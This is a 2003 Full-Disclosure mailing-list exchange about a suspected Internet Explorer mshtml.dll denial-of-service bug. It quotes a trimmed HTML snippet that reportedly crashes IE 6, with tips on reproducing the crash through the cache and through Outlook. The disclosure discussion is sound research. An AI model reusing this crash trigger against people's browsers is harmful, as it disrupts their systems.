RE: New Microsoft Internet Explorer mshtml.dll Denial of Service?

["Steve Wray" <steve.wray () paradise net nz>]

So why is it that visiting the page directly from MSIE
from html like this;
<html>
<head>
</head>
<body>
<a href="http://www.galad.com/extras/cg/cg.htm";>crash</a>
</body>
</html>

I get no crash?
But clicking through from outlook I do?
Ie; clicking from outlook = crash
clicking from IE = no crash
clicking from outlook afterward = crash


> -----Original Message-----
> From: full-disclosure-admin () lists netsys com 
> [mailto:full-disclosure-admin () lists netsys com] On Behalf Of 
> Tiago Halm
> Sent: Wednesday, 3 September 2003 4:37 a.m.
> To: 'Pellmann Paul'; full-disclosure () lists netsys com
> Subject: RE: [Full-disclosure] New Microsoft Internet 
> Explorer mshtml.dll Denial of Service?
>
>
> Paul has a point here, I believe!
>
> After a **lot** of html code "trimming" I came with an 
> offline version of
> the page like this:
>
> ------------------------------------------------------
> <html>
> <body>
> <table border="0" cellspacing="0" cellpadding="0">
> <tr>
>     <td><img src="http://www.galad.com/frame/e1x1.gif"; 
> width="1" height="1"
> alt=""></td>
> </tr>
> </table>
> </body>
> </html>
> -------------------------------------------------------
>
> and this piece of code does crash my browser (6.0.2800.1106)
> on windows 2000 server all patches and fixes up to date.
>
> NOTE: Every time you **want** the browser to crash, you must 
> delete it from
> the "Temporary Internet Files" before loading it in your browser.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html